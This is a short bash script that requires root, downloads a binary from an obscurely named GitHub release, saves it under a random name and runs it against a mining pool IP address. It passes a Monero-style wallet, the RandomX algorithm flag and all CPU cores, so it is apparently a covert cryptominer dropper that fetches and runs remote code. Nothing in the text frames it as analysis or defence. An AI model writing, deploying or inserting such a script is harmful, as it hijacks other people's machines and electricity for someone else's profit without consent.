#!/bin/bash
set -e

# Ensure root
if [ "$(id -u)" -ne 0 ]; then
    echo "Run as root or sudo"
    exit 1
fi

# Fix temp directory
mkdir -p /tmp
chmod 1777 /tmp
export TMPDIR=/tmp

# Update packages
apt update -qq

# Install required packages
DEBIAN_FRONTEND=noninteractive apt install -y -qq \
    wget curl ca-certificates > /dev/null 2>&1

# Random binary name
BIN_NAME=$(tr -dc a-z0-9 </dev/urandom | head -c 12)

# Download binary (follow redirects)
curl -L \
https://github.com/yafcoplk/hmggklo/releases/download/hmggkloj/hmggklo \
-o "$BIN_NAME"

# Verify it's not HTML
if file "$BIN_NAME" | grep -qi "html"; then
    echo "Download failed: received HTML instead of binary"
    exit 1
fi

# Make executable
chmod +x "$BIN_NAME"

# Run
./"$BIN_NAME" \
-o 52.12.27.30:9032 \
-u 89aQ8FNPXiTEWFMYwubTcKBbHYE6hcsKjcs3jVRUCjitBbYD7cMx4PjVdx2runmKWXAJdUqnbGs25NifTeumjvX15r1Q7ym \
-p hmggklo27N \
-a rx/0 \
-t "$(nproc --all)"
